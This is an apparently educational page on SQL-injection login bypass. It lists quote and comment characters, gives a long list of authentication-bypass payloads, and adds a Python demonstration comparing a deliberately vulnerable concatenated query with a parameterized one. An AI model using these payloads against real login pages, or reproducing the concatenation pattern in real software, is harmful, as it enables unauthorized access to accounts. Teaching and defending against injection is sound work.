Bypass Authentication

The best place to start with SQL injection is the login page for users or administrators. Every login relies on a database to validate the username and password. If the page and backend system do not sanitize the input data properly before constructing the SQL queries, the login process can be bypassed.

Some of the characters used in a SQL query to keep in mind:

' - Encloses a string

" - Encloses a string

# - The hash starts a comment; all characters after it are ignored

-- - The double dash starts a comment; all characters after it are ignored

/* - This combination opens a block comment; all characters after it are ignored, up to a closing */ if one is present

With these characters, it is a matter of combining them to trick the backend system:

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
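Why these inputs work, and what stops them, shown as an added example that is not part of the original page: a login check built by string concatenation next to the same check using bound parameters. The table layout, function names, and the use of an in-memory SQLite database as a stand-in backend are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory users table with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample row; a real system would store a password hash.
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_concat(db, username, password):
    """Vulnerable: user input is pasted directly into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None, sql
    except sqlite3.Error:
        return False, sql  # input produced malformed SQL: login fails

def login_param(db, username, password):
    """Hardened: placeholders keep input as data, never as SQL syntax."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = db.execute(sql, (username, password)).fetchone()
    return row is not None, sql

if __name__ == "__main__":
    db = make_db()
    # Two entries from the list above, each tried with a wrong password.
    for user in ("admin", "admin' --", "admin' or '1'='1"):
        ok_concat, sql = login_concat(db, user, "wrong")
        ok_param, _ = login_param(db, user, "wrong")
        print(f"{user!r:22} concat={ok_concat} param={ok_param}")
        print("    query sent:", sql)
```

Printing the concatenated query makes the cause visible: the quote in the input closes the string literal early, and the comment marker or the extra OR clause removes the password condition. With placeholders the same input is compared as a literal username and matches nothing.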
